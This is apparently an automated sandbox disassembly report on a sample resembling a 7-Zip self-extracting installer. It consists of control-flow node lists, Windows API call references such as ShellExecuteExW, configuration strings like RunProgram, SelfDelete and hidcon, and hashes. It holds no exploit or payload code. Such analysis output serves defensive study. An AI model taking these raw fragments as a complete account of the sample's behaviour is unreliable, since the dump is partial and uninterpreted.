SetLastError 8053->8054 8055 40201d ??2@YAPAXI GetEnvironmentVariableW 8053->8055 8054->8057 8058 4020ac 8054->8058 8056 40204c GetLastError 8055->8056 8069 40207e ??3@YAXPAX 8055->8069 8059 402052 8056->8059 8056->8069 8071 407717 8057->8071 8061 4020cb lstrlenA ??2@YAPAXI 8058->8061 8078 401f47 8058->8078 8064 402081 8059->8064 8065 40205c lstrcmpiW 8059->8065 8062 402136 MultiByteToWideChar 8061->8062 8063 4020fc GetLocaleInfoW 8061->8063 8062->8057 8063->8062 8067 402123 _wtol 8063->8067 8064->8054 8068 40206b ??3@YAXPAX 8065->8068 8065->8069 8067->8062 8068->8064 8069->8064 8070 4020c1 8070->8061 8085 40661a 8071->8085 8074 40774e 8089 4073d1 8074->8089 8075 40773c IsBadReadPtr 8075->8074 8079 401f51 GetUserDefaultUILanguage 8078->8079 8080 401f95 8078->8080 8081 401f72 GetSystemDefaultUILanguage 8079->8081 8082 401f6e 8079->8082 8080->8070 8081->8080 8083 401f7e GetSystemDefaultLCID 8081->8083 8082->8070 8083->8080 8084 401f8e 8083->8084 8084->8080 8086 406643 8085->8086 8087 40666f IsWindow 8085->8087 8086->8087 8088 40664b GetSystemMetrics GetSystemMetrics 8086->8088 8087->8074 8087->8075 8088->8087 8090 407444 8089->8090 8091 4073e0 8089->8091 8090->8050 8091->8090 8101 4024fc 8091->8101 8093 4073f1 8094 4024fc 2 API calls 8093->8094 8095 4073fc 8094->8095 8105 403b7f 8095->8105 8098 403b7f 19 API calls 8099 40740e ??3@YAXPAX ??3@YAXPAX 8098->8099 8099->8090 8102 402513 8101->8102 8114 40112b 8102->8114 8104 40251e 8104->8093 8178 403880 8105->8178 8107 403b59 8119 40393b 8107->8119 8109 403b69 8142 4039f6 8109->8142 8111 403b74 8165 4027c7 8111->8165 8115 401177 8114->8115 8116 401139 ??2@YAPAXI 8114->8116 8115->8104 8116->8115 8118 40115a 8116->8118 8117 40116f ??3@YAXPAX 8117->8115 8118->8117 8118->8118 8201 401411 8119->8201 8123 403954 8208 40254d 8123->8208 8125 403961 8126 4024fc 2 API calls 8125->8126 8127 40396e 8126->8127 8212 403805 8127->8212 8130 401362 2 API calls 8131 403992 8130->8131 8132 40254d 2 API calls 8131->8132 8133 40399f 8132->8133 8134 4024fc 2 API calls 8133->8134 8135 4039ac 8134->8135 8136 403805 3 API calls 8135->8136 8137 4039bc ??3@YAXPAX 8136->8137 8138 4024fc 2 API calls 8137->8138 8139 4039d3 8138->8139 8140 403805 3 API calls 8139->8140 8141 4039e2 ??3@YAXPAX ??3@YAXPAX 8140->8141 8141->8109 8143 401411 2 API calls 8142->8143 8144 403a04 8143->8144 8145 401362 2 API calls 8144->8145 8146 403a0f 8145->8146 8147 40254d 2 API calls 8146->8147 8148 403a1c 8147->8148 8149 4024fc 2 API calls 8148->8149 8150 403a29 8149->8150 8151 403805 3 API calls 8150->8151 8152 403a39 ??3@YAXPAX 8151->8152 8153 401362 2 API calls 8152->8153 8154 403a4d 8153->8154 8155 40254d 2 API calls 8154->8155 8156 403a5a 8155->8156 8157 4024fc 2 API calls 8156->8157 8158 403a67 8157->8158 8159 403805 3 API calls 8158->8159 8160 403a77 ??3@YAXPAX 8159->8160 8161 4024fc 2 API calls 8160->8161 8162 403a8e 8161->8162 8163 403805 3 API calls 8162->8163 8164 403a9d ??3@YAXPAX ??3@YAXPAX 8163->8164 8164->8111 8166 401411 2 API calls 8165->8166 8167 4027d5 8166->8167 8168 4027e5 ExpandEnvironmentStringsW 8167->8168 8171 40112b 2 API calls 8167->8171 8169 402809 8168->8169 8170 4027fe ??3@YAXPAX 8168->8170 8237 402535 8169->8237 8172 402840 8170->8172 8171->8168 8172->8098 8175 402824 8176 401362 2 API calls 8175->8176 8177 402838 ??3@YAXPAX 8176->8177 8177->8172 8179 401411 2 API calls 8178->8179 8180 40388e 8179->8180 8181 401362 2 API calls 8180->8181 8182 403899 8181->8182 8183 40254d 2 API calls 8182->8183 8184 4038a6 8183->8184 8185 4024fc 2 API calls 8184->8185 8186 4038b3 8185->8186 8187 403805 3 API calls 8186->8187 8188 4038c3 ??3@YAXPAX 8187->8188 8189 401362 2 API calls 8188->8189 8190 4038d7 8189->8190 8191 40254d 2 API calls 8190->8191 8192 4038e4 8191->8192 8193 4024fc 2 API calls 8192->8193 8194 4038f1 8193->8194 8195 403805 3 API calls 8194->8195 8196 403901 ??3@YAXPAX 8195->8196 8197 4024fc 2 API calls 8196->8197 8198 403918 8197->8198 8199 403805 3 API calls 8198->8199 8200 403927 ??3@YAXPAX ??3@YAXPAX 8199->8200 8200->8107 8202 40112b 2 API calls 8201->8202 8203 401425 8202->8203 8204 401362 8203->8204 8205 40136e 8204->8205 8207 401380 8204->8207 8206 40112b 2 API calls 8205->8206 8206->8207 8207->8123 8209 40255a 8208->8209 8217 401398 8209->8217 8211 402565 8211->8125 8213 40381b 8212->8213 8214 403817 ??3@YAXPAX 8212->8214 8213->8214 8221 4026b1 8213->8221 8225 402f96 8213->8225 8214->8130 8218 4013dc 8217->8218 8219 4013ac 8217->8219 8218->8211 8220 40112b 2 API calls 8219->8220 8220->8218 8222 4026c7 8221->8222 8223 4026db 8222->8223 8229 402346 memmove 8222->8229 8223->8213 8226 402fa5 8225->8226 8228 402fbe 8226->8228 8230 4026e6 8226->8230 8228->8213 8229->8223 8231 4026f6 8230->8231 8232 401398 2 API calls 8231->8232 8233 402702 8232->8233 8236 402346 memmove 8233->8236 8235 40270f 8235->8228 8236->8235 8238 402541 8237->8238 8239 402547 ExpandEnvironmentStringsW 8237->8239 8240 40112b 2 API calls 8238->8240 8239->8175 8240->8239 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211 9087 411388 ??2@YAPAXI 9088 411397 9087->9088
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                  • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                                                • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                                                • _wtol.MSVCRT ref: 0040509F
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                                                • _wtol.MSVCRT ref: 00405217
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                                  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                                  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                                • wsprintfW.USER32 ref: 00405595
                                                                                                • _wtol.MSVCRT ref: 004057DE
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                                • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                                • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                                • memset.MSVCRT ref: 004060AE
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                                • _wtol.MSVCRT ref: 00405F65
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                                • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                                • API String ID: 154539431-3058303289
                                                                                                • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                                • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                                • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                                • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 700 4017a2-4017a8 695->700 701 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->701 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 700->704 705 4017aa-4017ad 700->705 701->660 709 4017dc-4017df 704->709 707 4017b6-4017c2 705->707 708 4017af-4017b1 705->708 707->709 708->693 710 4017e1-4017e3 call 403354 709->710 711 4017f8-4017ff call 40301a 709->711 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 746 4018d1-4018d9 739->746 747 4018db-4018f3 call 40db53 739->747 742 40188a-40189a ??3@YAXPAX@Z 740->742 744 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 742->744 745 40189c-40189e 742->745 744->660 745->744 746->742 753 4018f5-401904 GetLastError 747->753 754 401906-40190e ??3@YAXPAX@Z 747->754 753->742 754->729
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
